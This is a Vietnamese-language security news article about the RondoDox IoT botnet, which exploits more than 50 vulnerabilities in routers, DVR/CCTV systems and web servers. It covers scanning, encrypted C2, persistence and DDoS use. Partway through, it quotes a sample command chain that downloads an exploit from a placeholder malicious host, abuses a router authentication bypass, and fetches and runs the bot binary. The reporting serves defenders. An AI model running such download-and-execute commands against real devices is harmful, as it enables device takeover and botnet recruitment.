Botnet RondoDox khai thác hơn 50 lỗ hổng để tấn công bộ định tuyến, hệ thống camera quan sát và máy chủ web

Kể từ khi xuất hiện vào đầu năm 2025, RondoDox đã nhanh chóng trở thành một trong những botnet tập trung vào IoT phổ biến nhất đang hoạt động, nhắm mục tiêu vào nhiều loại thiết bị được kết nối mạng—từ bộ định tuyến của người tiêu dùng đến hệ thống CCTV doanh nghiệp và máy chủ web.

Thiết kế mô-đun cho phép người vận hành triển khai các mô-đun khai thác được thiết kế riêng để chống lại hơn 50 lỗ hổng bảo mật khác nhau, cho phép xâm nhập nhanh chóng vào các nền tảng khác nhau.

Trong nhiều chiến dịch tấn công , kẻ thù đã tận dụng tính năng quét tự động để xác định các thiết bị bị lộ, sau đó là khai thác nhanh chóng và đăng ký chỉ huy và kiểm soát.

Các nhà nghiên cứu của Trend Micro đã phát hiện ra RondoDox vào tháng 4 năm 2025 sau khi quan sát thấy các mẫu lưu lượng bất thường phát ra từ các thiết bị DVR bị xâm phạm ở nhiều khu vực.

Phân tích tiếp theo cho thấy một công cụ cốt lõi được viết bằng Go, tạo điều kiện triển khai đa nền tảng và kích thước nhị phân hiệu quả.

Các giao thức lệnh của botnet hỗ trợ truyền thông được mã hóa, đảm bảo trao đổi C2 một cách bí mật ngay cả khi bị giám sát mạng.

Sau khi khai thác thành công, RondoDox triển khai một tác nhân duy trì nhẹ được thiết kế để tồn tại sau khi khởi động lại thiết bị và cập nhật chương trình cơ sở.

Tác nhân này định kỳ thăm dò máy chủ C2 để tìm các lệnh hoặc tải trọng mới, trong khi các quy trình tự phục hồi sẽ cài đặt lại các thành phần nếu đã bị xóa.

Nhiễm trùng thường dẫn đến việc thiết bị tham gia vào các cuộc tấn công DDoS quy mô lớn hoặc hoạt động proxy bí mật cho các hoạt động đe dọa tiếp theo.

Cơ chế lây nhiễm

Chuỗi lây nhiễm của RondoDox thường bắt đầu bằng giai đoạn trinh sát trong đó mô-đun quét của phần mềm độc hại sẽ thăm dò các thiết bị để tìm giao diện quản lý Telnet (cổng 23), SSH (cổng 22) và HTTP.

Khi mục tiêu được xác định, dữ liệu khai thác thích hợp - được trích xuất từ ​​kho lưu trữ mở rộng của mục tiêu - sẽ được phân phối.

Ví dụ, trong một mô-đun, trình quét sử dụng phương pháp bỏ qua xác thực bộ định tuyến CVE-2021-20090 để thực thi tải trọng shell:-

wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'

Sau khi thực thi mã ban đầu, tải trọng thiết lập kênh TLS được mã hóa trở lại C2 trên cổng 443, ngụy trang lưu lượng truy cập của nó thành HTTPS hợp pháp.

Các nhà phân tích của Trend Micro lưu ý rằng chương trình mã hóa này dựa trên một gói chứng chỉ tùy chỉnh, làm phức tạp thêm các nỗ lực chặn và kiểm tra.

Sau khi thiết lập được giao tiếp, bot sẽ yêu cầu và tải các mô-đun bổ sung—chẳng hạn như máy quét mạng hoặc công cụ DDoS—trực tiếp vào bộ nhớ.

Luồng lây nhiễm nhiều giai đoạn làm nổi bật quá trình chuyển đổi từ trinh sát sang khai thác và duy trì.

Dòng thời gian của lỗ hổng RondoDox (Nguồn – Trend Micro)

Theo cơ chế lây nhiễm, RondoDox tận dụng các kỹ thuật duy trì dành riêng cho thiết bị, chẳng hạn như mục crontab trên DVR chạy Linux hoặc sửa đổi hình ảnh chương trình cơ sở trên một số mẫu bộ định tuyến, đảm bảo hoạt động liên tục.

Khả năng thích ứng và thư viện khai thác rộng lớn của nó nhấn mạnh nhu cầu cấp thiết về quản lý bản vá và phân đoạn mạng để giảm thiểu mối đe dọa đang phát triển này.

Bảng dưới đây cung cấp tổng quan chi tiết về hơn 50 lỗ hổng bảo mật hiện đang bị RondoDox khai thác, bao gồm mã định danh CVE, sản phẩm bị ảnh hưởng, xếp hạng tác động, điều kiện tiên quyết khai thác bắt buộc và điểm CVSS 3.1.

Theo : Cyber Security News